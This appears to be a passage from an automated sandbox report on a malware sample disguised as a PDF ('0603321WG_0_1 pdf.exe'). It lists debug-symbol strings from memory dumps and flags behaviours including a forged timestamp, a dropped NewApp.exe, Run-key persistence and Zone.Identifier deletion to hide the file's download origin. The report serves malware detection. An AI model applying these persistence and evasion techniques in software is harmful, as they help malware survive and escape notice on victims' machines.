                      Source: Binary string: mscorlib.pdb source: 0603321WG_0_1 pdf.exe, 00000000.00000002.670963897.0000000000ED2000.00000004.00000020.sdmp, NewApp.exe, 00000013.00000002.810490743.000000000088A000.00000004.00000020.sdmp, WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: propsys.pdbv source: WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: \??\C:\Windows\mscorlib.pdb>Y source: NewApp.exe, 0000000F.00000002.809881079.00000000014CF000.00000004.00000020.sdmp
                      Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdb source: WerFault.exe, 0000000A.00000003.685738561.0000000005184000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.829119339.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.832058326.0000000005764000.00000004.00000040.sdmp
                      Source: Binary string: iVisualBasic.pdb source: 0603321WG_0_1 pdf.exe, 00000000.00000002.670154182.00000000009A7000.00000004.00000010.sdmp, NewApp.exe, 0000000F.00000002.806394877.0000000000FD7000.00000004.00000010.sdmp, NewApp.exe, 00000013.00000002.806993531.0000000000537000.00000004.00000010.sdmp
                      Source: Binary string: wkernel32.pdb( source: WerFault.exe, 0000001F.00000003.806462338.0000000000A21000.00000004.00000001.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000A.00000003.685719663.0000000005021000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831487010.0000000005791000.00000004.00000001.sdmp
                      Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb0,J source: NewApp.exe, 0000000F.00000002.809881079.00000000014CF000.00000004.00000020.sdmp
                      Source: Binary string: wntdll.pdbk source: WerFault.exe, 0000000A.00000003.685719663.0000000005021000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.829119339.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831487010.0000000005791000.00000004.00000001.sdmp
                      Source: Binary string: rasadhlp.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: cldapi.pdbye source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb13Z source: 0603321WG_0_1 pdf.exe, 00000000.00000002.670963897.0000000000ED2000.00000004.00000020.sdmp
                      Source: Binary string: J0603321WG_0_1 pdf.PDB source: 0603321WG_0_1 pdf.exe, 00000000.00000002.670154182.00000000009A7000.00000004.00000010.sdmp
                      Source: Binary string: WinTypes.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: rasapi32.pdbV#jN source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp
                      Source: Binary string: cryptsp.pdbm source: WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp
                      Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: diasymreader.pdb_ source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: crypt32.pdbme"j source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp
                      Source: Binary string: }C:\Users\user\AppData\Roaming\NewApp\NewApp.PDB?p source: NewApp.exe, 00000013.00000002.806993531.0000000000537000.00000004.00000010.sdmp
                      Source: Binary string: mscorlib.pdbx source: WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp
                      Source: Binary string: .pdb, source: 0603321WG_0_1 pdf.exe, 00000000.00000002.670154182.00000000009A7000.00000004.00000010.sdmp
                      Source: Binary string: rsaenh.pdbk source: WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp
                      Source: Binary string: System.Xml.pdb&& source: WerFault.exe, 0000001F.00000003.829019707.0000000004DF3000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: System.Core.ni.pdb% source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: clrjit.pdbu source: WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: NewApp.exe, 0000000F.00000002.810619163.0000000001557000.00000004.00000020.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000A.00000003.685883855.0000000005180000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.829603052.0000000004DE0000.00000004.00000040.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb<Cwo source: NewApp.exe, 00000013.00000002.810490743.000000000088A000.00000004.00000020.sdmp
                      Source: Binary string: fwpuclnt.pdbH source: WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp
                      Source: Binary string: fltLib.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: 0603321WG_0_1 pdf.exe, 00000000.00000002.670979775.0000000000EE5000.00000004.00000020.sdmp, NewApp.exe, 0000000F.00000002.810472818.0000000001543000.00000004.00000020.sdmp, NewApp.exe, 00000013.00000002.810490743.000000000088A000.00000004.00000020.sdmp
                      Source: Binary string: shell32.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: System.Core.ni.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: winhttp.pdb6 source: WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp
                      Source: Binary string: NewApp.PDBI source: NewApp.exe, 0000000F.00000002.806394877.0000000000FD7000.00000004.00000010.sdmp
                      Source: Binary string: wimm32.pdbO5 source: WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.829603052.0000000004DE0000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: dhcpcsvc6.pdbD source: WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdbh source: WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb** source: 0603321WG_0_1 pdf.exe, 00000000.00000002.670942444.0000000000EBA000.00000004.00000020.sdmp
                      Source: Binary string: dnsapi.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: rasapi32.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: iLC:\Windows\Microsoft.VisualBasic.pdb source: 0603321WG_0_1 pdf.exe, 00000000.00000002.670154182.00000000009A7000.00000004.00000010.sdmp, NewApp.exe, 0000000F.00000002.806394877.0000000000FD7000.00000004.00000010.sdmp, NewApp.exe, 00000013.00000002.806993531.0000000000537000.00000004.00000010.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: System.Xml.ni.pdbT source: WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp
                      Source: Binary string: diasymreader.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: winhttp.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: edputil.pdb: source: WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp
                      Source: Binary string: Windows.StateRepositoryPS.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.ni.pdb% source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: System.Configuration.pdb;^ source: WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp
                      Source: Binary string: System.ni.pdbT3 source: WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp
                      Source: Binary string: rtutils.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: System.pdbx source: WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 0000001F.00000003.804994756.0000000000A15000.00000004.00000001.sdmp
                      Source: Binary string: profapi.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: System.Xml.ni.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000A.00000003.685883855.0000000005180000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.829603052.0000000004DE0000.00000004.00000040.sdmp
                      Source: Binary string: WLDP.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdb source: WerFault.exe, 0000000A.00000003.685719663.0000000005021000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.829119339.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831487010.0000000005791000.00000004.00000001.sdmp
                      Source: Binary string: clrjit.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: fltLib.pdbg source: WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp
                      Source: Binary string: rasman.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: propsys.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: System.Configuration.ni.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: powrprof.pdbs source: WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp
                      Source: Binary string: winnsi.pdb source: WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp
                      Source: Binary string: wmswsock.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: version.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: inaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb1 source: NewApp.exe, 0000000F.00000002.809881079.00000000014CF000.00000004.00000020.sdmp
                      Source: Binary string: wintrust.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: C:\Users\user\AppData\Roaming\NewApp\NewApp.PDBL source: NewApp.exe, 0000000F.00000002.806394877.0000000000FD7000.00000004.00000010.sdmp
                      Source: Binary string: System.Xml.pdb source: WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: System.pdb source: WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp
                      Source: Binary string: ore.ni.pdb source: WerFault.exe, 0000001F.00000003.829429051.0000000004E26000.00000004.00000001.sdmp
                      Source: Binary string: msasn1.pdbb source: WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: NewApp.exe, 00000013.00000002.810490743.000000000088A000.00000004.00000020.sdmp
                      Source: Binary string: ore.pdb source: WerFault.exe, 0000001F.00000003.829429051.0000000004E26000.00000004.00000001.sdmp
                      Source: Binary string: System.Windows.Forms.pdb source: WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000A.00000003.685883855.0000000005180000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.829603052.0000000004DE0000.00000004.00000040.sdmp
                      Source: Binary string: psapi.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: System.Configuration.pdbW% source: WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: 0603321WG_0_1 pdf.exe, 00000000.00000002.670979775.0000000000EE5000.00000004.00000020.sdmp, NewApp.exe, 0000000F.00000002.810619163.0000000001557000.00000004.00000020.sdmp
                      Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000A.00000003.685719663.0000000005021000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.829119339.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831487010.0000000005791000.00000004.00000001.sdmp
                      Source: Binary string: oleaut32.pdby source: WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp
                      Source: Binary string: cldapi.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: System.Core.pdbx source: WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000A.00000003.685719663.0000000005021000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.829119339.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831487010.0000000005791000.00000004.00000001.sdmp
                      Source: Binary string: mscoreei.pdb source: WerFault.exe, 0000000A.00000003.685719663.0000000005021000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.829119339.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831487010.0000000005791000.00000004.00000001.sdmp
                      Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 0000001F.00000003.806548362.0000000000A27000.00000004.00000001.sdmp
                      Source: Binary string: combase.pdbk source: WerFault.exe, 0000000A.00000003.685738561.0000000005184000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832058326.0000000005764000.00000004.00000040.sdmp
                      Source: Binary string: System.Core.pdb source: WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: System.Windows.Forms.pdbx source: WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp
                      Source: Binary string: OneCoreUAPCommonProxyStub.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: Microsoft.VisualBasic.pdb" source: WerFault.exe, 0000001F.00000003.829019707.0000000004DF3000.00000004.00000040.sdmp
                      Source: Binary string: System.Xml.ni.pdb" source: WerFault.exe, 0000001F.00000003.829019707.0000000004DF3000.00000004.00000040.sdmp
                      Source: Binary string: System.ni.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: clrjit.pdb/t)r source: WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: }}NewApp.PDB} source: NewApp.exe, 00000013.00000002.806993531.0000000000537000.00000004.00000010.sdmp
                      Source: Binary string: edputil.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: dhcpcsvc.pdb[e<jr source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp
                      Source: Binary string: crypt32.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp

                      Data Obfuscation:

                      barindex
                      Binary contains a suspicious time stampShow sources
                      Source: initial sampleStatic PE information: 0x88460DE1 [Fri Jun 13 17:14:09 2042 UTC]
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeCode function: 0_2_05C005E1 push ds; ret
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 15_2_072B267E pushad ; retf
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 19_2_077F267F pushad ; retf
                      Source: initial sampleStatic PE information: section name: .text entropy: 6.81509040875
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeFile created: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeJump to dropped file
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run NewAppJump to behavior
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run NewAppJump to behavior

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeFile opened: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe:Zone.Identifier read attributes | delete
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess information set: NOOPENFILEERRORBOX
